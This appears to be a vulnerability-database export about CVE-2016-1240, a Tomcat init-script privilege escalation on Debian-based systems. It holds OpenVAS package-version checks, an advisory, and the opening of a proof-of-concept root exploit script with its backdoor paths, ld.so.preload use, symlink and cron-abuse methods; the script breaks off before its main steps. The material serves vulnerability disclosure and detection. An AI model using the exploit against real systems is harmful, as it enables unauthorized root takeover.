$0 path_to_catalina.out [-deferred]\

\"

exit 3

fi

if [ \"$2\" = \"-deferred\" ]; then

mode=\"deferred\"






", "modified": "2016-10-08T00:00:00", "published": "2016-10-08T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/79941.htm", "id": "MYHACK58:62201679941", "type": "myhack58", "title": "Vulnerability alert: Tomcat local privilege escalation vulnerability CVE-2016-1240, reference PoC exploit - alert - myhack58.com", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:54:16", "description": "Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.", "edition": 2, "published": "2016-09-15T00:00:00", "title": "Debian Security Advisory DSA 3669-1 (tomcat7 - security update)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703669", "id": "OPENVAS:703669", "sourceData": "# OpenVAS Vulnerability Test

# $Id: deb_3669.nasl 6608 2017-07-07 12:05:05Z cfischer $

# Auto-generated from advisory DSA 3669-1 using nvtgen 1.0

# Script version: 1.0

#

# Author:

# Greenbone Networks

#

# Copyright:

# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net

# Text descriptions are largely excerpted from the referenced

# advisory, and are Copyright (c) the respective author(s)

#

# This program is free software; you can redistribute it and/or

# modify it under the terms of the GNU General Public License

# as published by the Free Software Foundation; either version 2

# of the License, or (at your option) any later version.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

#





if(description)

{

script_id(703669);

script_version(\"$Revision: 6608 $\");

script_cve_id(\"CVE-2016-1240\");

script_name(\"Debian Security Advisory DSA 3669-1 (tomcat7 - security update)\");

script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");

script_tag(name: \"creation_date\", value: \"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");

script_tag(name:\"cvss_base\", value:\"7.2\");

script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_tag(name: \"solution_type\", value: \"VendorFix\");

script_tag(name: \"qod_type\", value: \"package\");



script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3669.html\");





script_category(ACT_GATHER_INFO);



script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");

script_family(\"Debian Local Security Checks\");

script_dependencies(\"gather-package-list.nasl\");

script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");

script_tag(name: \"affected\", value: \"tomcat7 on Debian Linux\");

script_tag(name: \"insight\", value: \"Apache Tomcat implements the Java Servlet

and the JavaServer Pages (JSP) specifications from Sun Microsystems, and provides a

'pure Java' HTTP web server environment for Java code to run.\");

script_tag(name: \"solution\", value: \"For the stable distribution (jessie), this

problem has been fixed in version 7.0.56-3+deb8u4.



We recommend that you upgrade your tomcat7 packages.\");

script_tag(name: \"summary\", value: \"Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.\");

script_tag(name: \"vuldetect\", value: \"This check tests the installed software

version using the apt package manager.\");

exit(0);

}



include(\"revisions-lib.inc\");

include(\"pkg-lib-deb.inc\");



res = \"\";

report = \"\";

if ((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat7-admin\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat7-common\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat7-docs\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat7-examples\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat7-user\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}



if (report != \"\") {

security_message(data:report);

} else if (__pkg_match) {

exit(99); # Not vulnerable.

}

", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:46", "description": "Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.", "edition": 5, "published": "2016-09-15T00:00:00", "title": "Debian Security Advisory DSA 3669-1 (tomcat7 - security update)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703669", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703669", "sourceData": "# OpenVAS Vulnerability Test

# $Id: deb_3669.nasl 14279 2019-03-18 14:48:34Z cfischer $

# Auto-generated from advisory DSA 3669-1 using nvtgen 1.0

# Script version: 1.0

#

# Author:

# Greenbone Networks

#

# Copyright:

# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net

# Text descriptions are largely excerpted from the referenced

# advisory, and are Copyright (c) the respective author(s)

#

# This program is free software; you can redistribute it and/or

# modify it under the terms of the GNU General Public License

# as published by the Free Software Foundation; either version 2

# of the License, or (at your option) any later version.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

#



if(description)

{

script_oid(\"1.3.6.1.4.1.25623.1.0.703669\");

script_version(\"$Revision: 14279 $\");

script_cve_id(\"CVE-2016-1240\");

script_name(\"Debian Security Advisory DSA 3669-1 (tomcat7 - security update)\");

script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");

script_tag(name:\"creation_date\", value:\"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");

script_tag(name:\"cvss_base\", value:\"7.2\");

script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_tag(name:\"solution_type\", value:\"VendorFix\");

script_tag(name:\"qod_type\", value:\"package\");



script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3669.html\");



script_category(ACT_GATHER_INFO);

script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");

script_family(\"Debian Local Security Checks\");

script_dependencies(\"gather-package-list.nasl\");

script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");

script_tag(name:\"affected\", value:\"tomcat7 on Debian Linux\");

script_tag(name:\"solution\", value:\"For the stable distribution (jessie), this

problem has been fixed in version 7.0.56-3+deb8u4.



We recommend that you upgrade your tomcat7 packages.\");

script_tag(name:\"summary\", value:\"Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.\");

script_tag(name:\"vuldetect\", value:\"This check tests the installed software

version using the apt package manager.\");



exit(0);

}



include(\"revisions-lib.inc\");

include(\"pkg-lib-deb.inc\");



res = \"\";

report = \"\";

if((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat7-admin\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat7-common\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat7-docs\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat7-examples\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat7-user\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {

report += res;

}



if(report != \"\") {

security_message(data:report);

} else if (__pkg_match) {

exit(99);

}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:20", "description": "Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.", "edition": 5, "published": "2016-09-15T00:00:00", "title": "Debian Security Advisory DSA 3670-1 (tomcat8 - security update)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703670", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703670", "sourceData": "# OpenVAS Vulnerability Test

# $Id: deb_3670.nasl 14279 2019-03-18 14:48:34Z cfischer $

# Auto-generated from advisory DSA 3670-1 using nvtgen 1.0

# Script version: 1.0

#

# Author:

# Greenbone Networks

#

# Copyright:

# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net

# Text descriptions are largely excerpted from the referenced

# advisory, and are Copyright (c) the respective author(s)

#

# This program is free software; you can redistribute it and/or

# modify it under the terms of the GNU General Public License

# as published by the Free Software Foundation; either version 2

# of the License, or (at your option) any later version.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

#



if(description)

{

script_oid(\"1.3.6.1.4.1.25623.1.0.703670\");

script_version(\"$Revision: 14279 $\");

script_cve_id(\"CVE-2016-1240\");

script_name(\"Debian Security Advisory DSA 3670-1 (tomcat8 - security update)\");

script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");

script_tag(name:\"creation_date\", value:\"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");

script_tag(name:\"cvss_base\", value:\"7.2\");

script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_tag(name:\"solution_type\", value:\"VendorFix\");

script_tag(name:\"qod_type\", value:\"package\");



script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3670.html\");



script_category(ACT_GATHER_INFO);

script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");

script_family(\"Debian Local Security Checks\");

script_dependencies(\"gather-package-list.nasl\");

script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");

script_tag(name:\"affected\", value:\"tomcat8 on Debian Linux\");

script_tag(name:\"solution\", value:\"For the stable distribution (jessie),

this problem has been fixed in version 8.0.14-1+deb8u3.



For the unstable distribution (sid), this problem will be fixed soon.



We recommend that you upgrade your tomcat8 packages.\");

script_tag(name:\"summary\", value:\"Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.\");

script_tag(name:\"vuldetect\", value:\"This check tests the installed software

version using the apt package manager.\");



exit(0);

}



include(\"revisions-lib.inc\");

include(\"pkg-lib-deb.inc\");



res = \"\";

report = \"\";

if((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}

if((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {

report += res;

}



if(report != \"\") {

security_message(data:report);

} else if (__pkg_match) {

exit(99);

}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:05", "description": "Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.", "edition": 2, "published": "2016-09-15T00:00:00", "title": "Debian Security Advisory DSA 3670-1 (tomcat8 - security update)", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703670", "id": "OPENVAS:703670", "sourceData": "# OpenVAS Vulnerability Test

# $Id: deb_3670.nasl 6608 2017-07-07 12:05:05Z cfischer $

# Auto-generated from advisory DSA 3670-1 using nvtgen 1.0

# Script version: 1.0

#

# Author:

# Greenbone Networks

#

# Copyright:

# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net

# Text descriptions are largely excerpted from the referenced

# advisory, and are Copyright (c) the respective author(s)

#

# This program is free software; you can redistribute it and/or

# modify it under the terms of the GNU General Public License

# as published by the Free Software Foundation; either version 2

# of the License, or (at your option) any later version.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

#





if(description)

{

script_id(703670);

script_version(\"$Revision: 6608 $\");

script_cve_id(\"CVE-2016-1240\");

script_name(\"Debian Security Advisory DSA 3670-1 (tomcat8 - security update)\");

script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");

script_tag(name: \"creation_date\", value: \"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");

script_tag(name:\"cvss_base\", value:\"7.2\");

script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_tag(name: \"solution_type\", value: \"VendorFix\");

script_tag(name: \"qod_type\", value: \"package\");



script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3670.html\");





script_category(ACT_GATHER_INFO);



script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");

script_family(\"Debian Local Security Checks\");

script_dependencies(\"gather-package-list.nasl\");

script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");

script_tag(name: \"affected\", value: \"tomcat8 on Debian Linux\");

script_tag(name: \"insight\", value: \"Apache Tomcat implements the Java

Servlet and the JavaServer Pages (JSP) specifications from Oracle, and provides

a 'pure Java' HTTP web server environment for Java code to run.\");

script_tag(name: \"solution\", value: \"For the stable distribution (jessie),

this problem has been fixed in version 8.0.14-1+deb8u3.



For the unstable distribution (sid), this problem will be fixed soon.



We recommend that you upgrade your tomcat8 packages.\");

script_tag(name: \"summary\", value: \"Dawid Golunski of LegalHackers discovered

that the Tomcat init script performed unsafe file handling, which could result in

local privilege escalation.\");

script_tag(name: \"vuldetect\", value: \"This check tests the installed software

version using the apt package manager.\");

exit(0);

}



include(\"revisions-lib.inc\");

include(\"pkg-lib-deb.inc\");



res = \"\";

report = \"\";

if ((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}

if ((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {

report += res;

}



if (report != \"\") {

security_message(data:report);

} else if (__pkg_match) {

exit(99); # Not vulnerable.

}

", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:44", "description": "The remote host is missing an update for the ", "edition": 9, "published": "2016-09-20T00:00:00", "title": "Ubuntu Update for tomcat8 USN-3081-1", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842892", "sourceData": "###############################################################################

# OpenVAS Vulnerability Test

#

# Ubuntu Update for tomcat8 USN-3081-1

#

# Authors:

# System Generated Check

#

# Copyright:

# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net

#

# This program is free software; you can redistribute it and/or modify

# it under the terms of the GNU General Public License version 2

# (or any later version), as published by the Free Software Foundation.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

###############################################################################



if(description)

{

script_oid(\"1.3.6.1.4.1.25623.1.0.842892\");

script_version(\"$Revision: 14140 $\");

script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");

script_tag(name:\"creation_date\", value:\"2016-09-20 05:41:58 +0200 (Tue, 20 Sep 2016)\");

script_cve_id(\"CVE-2016-1240\");

script_tag(name:\"cvss_base\", value:\"7.2\");

script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_tag(name:\"qod_type\", value:\"package\");

script_name(\"Ubuntu Update for tomcat8 USN-3081-1\");

script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat8'

package(s) announced via the referenced advisory.\");

script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");

script_tag(name:\"insight\", value:\"Dawid Golunski discovered that the Tomcat

init script incorrectly handled creating log files. A remote attacker could

possibly use this issue to obtain root privileges. (CVE-2016-1240)



This update also reverts a change in behaviour introduced in USN-3024-1 by

setting mapperContextRootRedirectEnabled to True by default.\");

script_tag(name:\"affected\", value:\"tomcat8 on Ubuntu 16.04 LTS,

Ubuntu 14.04 LTS,

Ubuntu 12.04 LTS\");

script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");



script_xref(name:\"USN\", value:\"3081-1\");

script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3081-1/\");

script_tag(name:\"solution_type\", value:\"VendorFix\");

script_category(ACT_GATHER_INFO);

script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");

script_family(\"Ubuntu Local Security Checks\");

script_dependencies(\"gather-package-list.nasl\");

script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS)\");



exit(0);

}



include(\"revisions-lib.inc\");

include(\"pkg-lib-deb.inc\");



release = dpkg_get_ssh_release();

if(!release)

exit(0);



res = \"\";



if(release == \"UBUNTU14.04 LTS\")

{



if ((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.52-1ubuntu0.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)

{

security_message(data:res);

exit(0);

}



if ((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.52-1ubuntu0.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)

{

security_message(data:res);

exit(0);

}



if (__pkg_match) exit(99);

exit(0);

}





if(release == \"UBUNTU12.04 LTS\")

{



if ((res = isdpkgvuln(pkg:\"libtomcat6-java\", ver:\"6.0.35-1ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)

{

security_message(data:res);

exit(0);

}



if ((res = isdpkgvuln(pkg:\"tomcat6\", ver:\"6.0.35-1ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)

{

security_message(data:res);

exit(0);

}



if (__pkg_match) exit(99);

exit(0);

}





if(release == \"UBUNTU16.04 LTS\")

{



if ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.32-1ubuntu1.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)

{

security_message(data:res);

exit(0);

}



if ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.32-1ubuntu1.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)

{

security_message(data:res);

exit(0);

}



if (__pkg_match) exit(99);

exit(0);

}

", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "

Apache Tomcat 876 (Debian-Based Distros) - Local Privilege Escalation", "edition": 1, "published": "2016-10-03T00:00:00", "title": "Apache Tomcat 876 (Debian-Based Distros) - Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1240"], "modified": "2016-10-03T00:00:00", "id": "EXPLOITPACK:1B5B3B594F0BEB22BF053920EF4C7307", "href": "", "sourceData": "=============================================

- Discovered by: Dawid Golunski

- http://legalhackers.com

- dawid (at) legalhackers.com



- CVE-2016-1240

- Release date: 30.09.2016

- Revision: 1

- Severity: High

=============================================





I. VULNERABILITY

-------------------------



Apache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation



Affected debian packages:



Tomcat 8 <= 8.0.36-2

Tomcat 7 <= 7.0.70-2

Tomcat 6 <= 6.0.45+dfsg-1~deb8u1



Ubuntu systems are also affected. See section VII. for details.

Other systems using the affected debian packages may also be affected.





II. BACKGROUND

-------------------------



\"The Apache Tomcat\u00ae software is an open source implementation of the

Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket

technologies. The Java Servlet, JavaServer Pages, Java Expression Language

and Java WebSocket specifications are developed under the Java Community

Process.



The Apache Tomcat software is developed in an open and participatory

environment and released under the Apache License version 2.

The Apache Tomcat project is intended to be a collaboration of the

best-of-breed developers from around the world.



Apache Tomcat software powers numerous large-scale, mission-critical web

applications across a diverse range of industries and organizations.

Some of these users and their stories are listed on the PoweredBy wiki page.

\"



http://tomcat.apache.org/





III. INTRODUCTION

-------------------------



Tomcat (6, 7, 8) packages provided by default repositories on Debian-based

distributions (including Debian, Ubuntu etc.) provide a vulnerable

tomcat init script that allows local attackers who have already gained access

to the tomcat account (for example, by exploiting an RCE vulnerability

in a java web application hosted on Tomcat, uploading a webshell etc.) to

escalate their privileges from tomcat user to root and fully compromise the

target system.



IV. DESCRIPTION

-------------------------



The vulnerability is located in the tomcat init script provided by affected

packages, normally installed at /etc/init.d/tomcatN.



The script for tomcat7 contains the following lines:



-----[tomcat7]----



# Run the catalina.sh script as a daemon

set +e

touch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out

chown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out



-------[eof]------



Local attackers who have gained access to the server in the context of the

tomcat user (for example, through a vulnerability in a web application) would

be able to replace the log file with a symlink to an arbitrary system file

and escalate their privileges to root once Tomcat init script (running as root)

re-opens the catalina.out file after a service restart, reboot etc.



As attackers would already have a tomcat account at the time of exploitation,

they could also kill the tomcat processes to introduce the need for a restart.





V. PROOF OF CONCEPT EXPLOIT

-------------------------



------[ tomcat-rootprivesc-deb.sh ]------



#!/bin/bash

#

# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit

#

# CVE-2016-1240

#

# Discovered and coded by:

#

# Dawid Golunski

# http://legalhackers.com

#

# This exploit targets Tomcat (versions 6, 7 and 8) packaging on

# Debian-based distros including Debian, Ubuntu etc.

# It allows attackers with a tomcat shell (e.g. obtained remotely through a

# vulnerable java webapp, or locally via weak permissions on webapps in the

# Tomcat webroot directories etc.) to escalate their privileges to root.

#

# Usage:

# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]

#

# The exploit can used in two ways:

#

# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly

# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.

# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up

# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)

#

# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to

# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.

# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a

# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can

# then add arbitrary commands to the file which will be executed with root privileges by

# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default

# Ubuntu/Debian Tomcat installations).

#

# See full advisory for details at:

# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html

#

# Disclaimer:

# For testing purposes only. Do no harm.

#



BACKDOORSH=\"/bin/bash\"

BACKDOORPATH=\"/tmp/tomcatrootsh\"

PRIVESCLIB=\"/tmp/privesclib.so\"

PRIVESCSRC=\"/tmp/privesclib.c\"

SUIDBIN=\"/usr/bin/sudo\"



function cleanexit {

\t# Cleanup

\techo -e \"\

[+] Cleaning up...\"

\trm -f $PRIVESCSRC

\trm -f $PRIVESCLIB

\trm -f $TOMCATLOG

\ttouch $TOMCATLOG

\tif [ -f /etc/ld.so.preload ]; then

\t\techo -n > /etc/ld.so.preload 2>/dev/null

\tfi

\techo -e \"\

[+] Job done. Exiting with code $1 \

\"

\texit $1

}



function ctrl_c() {

echo -e \"\

[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"

\tcleanexit 0

}



#intro

echo -e \"\\033[94m \

Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\

CVE-2016-1240\

\"

echo -e \"Discovered and coded by: \

\

Dawid Golunski \

http://legalhackers.com \\033[0m\"



# Args

if [ $# -lt 1 ]; then

\techo -e \"\

[!] Exploit usage: \

\

$0 path_to_catalina.out [-deferred]\

\"

\texit 3

fi

